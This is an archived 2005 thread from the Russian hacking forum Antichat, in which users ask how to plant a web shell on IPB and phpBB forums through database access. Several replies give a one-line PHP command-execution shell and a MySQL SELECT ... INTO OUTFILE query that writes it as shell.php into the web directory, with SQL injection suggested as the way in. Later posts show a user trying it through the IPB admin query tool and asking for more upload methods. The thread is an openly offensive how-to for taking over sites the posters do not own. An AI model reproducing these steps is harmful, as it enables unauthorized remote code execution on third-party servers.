Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Заливка шелла и снятие бана в ipb через mysql (https://forum.antichat.xyz/showthread.php?t=11075)

darks 24.11.2005 20:05
Заливка шелла и снятие бана в ipb через mysql
 
Есть доступ к базе ... Возможно ли как нить залить шелл через неё ? И что нужно редактить в этой базе стобы снять бан ? Я тут попытался но у меня что то не особо получилось ... Кстати форум Ipb стоит .

madnet 24.11.2005 20:30
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME

*Van* 24.11.2005 21:23
А на phpbb можно таким способом заливать шелл?

m0nzt3r 24.11.2005 21:39
ну пхпББ тоже на БД работает соответсвтенно можно=)

*Van* 24.11.2005 21:56
И это будет работатьь на любых версиях?

milord69 24.11.2005 22:02
Цитата:
Сообщение от madnet
Сначала заносим в БД запись нашего шела типа
<? system($_GET(cmd)) ?>

Потом сохраняем в файл
SELECT blabla INTO OUTFILE 'shell.php' FROM TABLE_NAME

Обьясни плиз немного подробнее

m0nzt3r 24.11.2005 22:09
Цитата:
Обьясни плиз немного подробнее
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе.. и делаешь запрос с помощью которого добавляешь юзера(или еще чего то в базу) с содержанием <? system($_GET['cmd']; ?> а дальше по команде маднета
надеюсь понятно??
Ван, ну наверно))ведь во всех версиях есть коннект к БД =))

milord69 24.11.2005 22:13
Цитата:
Сообщение от m0nzt3r
находишь СКУЛЬ иньекцию..или пробиваешься и достаешь доступ к базе..
Доступ есть... Но вот дальше не понял. Если можно, то подробней плиз. :)

Rebz 24.11.2005 22:37
Подробней - выучи команды SQL.
Insert, select хотя бы. C помощью команды insert добавь юзера.

qBiN 24.11.2005 23:53
2 ВанПрошу не флудить и по-возможности не задавать однотипные а также глупые вопросы.Так же не писать по одному вопросу в сообщении,если захотел что то добавить(незначительное) то есть кнопочка редактирования сообщения.
Все выше перечисленное относится и к другим пользователям.
Настчет темы добавлю к сообщению madnet'a
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.

..::k0rps::.. 25.11.2005 20:38
Цитата:
Сообщение от qBiN
SELECT `my_column` INTO OUTFILE '/path2/wwwdir/shell.php' FROM TABLE_NAME
Подчеркнутым- полный путь к файлу.


Всё делаю как написано, в итоге пишет вот что:

Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)

Что это такое и как с этим бароться=)?

qBiN 25.11.2005 21:09
Цитата:
Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)
Что это такое
Те что перевести трудно??
Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах.
Цитата:
и как с этим бароться=)?
ВВести правильный пароль =)

..::k0rps::.. 25.11.2005 21:20
Цитата:
Сообщение от qBiN
Те что перевести трудно??
Не пускает под юзером viperweb_obrd1, при использовании пароля.Скорее всего неправильный пароль в скриптах.
ВВести правильный пароль =)

Я в админке ИПБ 1. 3 , там есть такая функция:

SQL Management >>> mySQL Toolbox>>>RUN QUERY

И когда вбиваю всё что ты сказал, вылазиет эта шняга и каким образом я поменяю пароль, ты мне скажи=)
Как можно кроме как через смайлы и мускул ещё залить шелл через этот движок?

qBiN 25.11.2005 23:50
Цитата:
Access denied for user: 'viperweb_ibrd1@localhost' (Using password: YES)
Я расшифровал что это такое,и в чем ошибка обычно кроется. Или не правильный юзер или пароль.

..::k0rps::.. 26.11.2005 00:03
Цитата:
Сообщение от qBiN
Я расшифровал что это такое,и в чем ошибка обычно кроется. Или не правильный юзер или пароль.
А насчёт других методов залива знаеш чёнить?
Если да то поделись, я тебя отблагадарю=)


Время: 22:43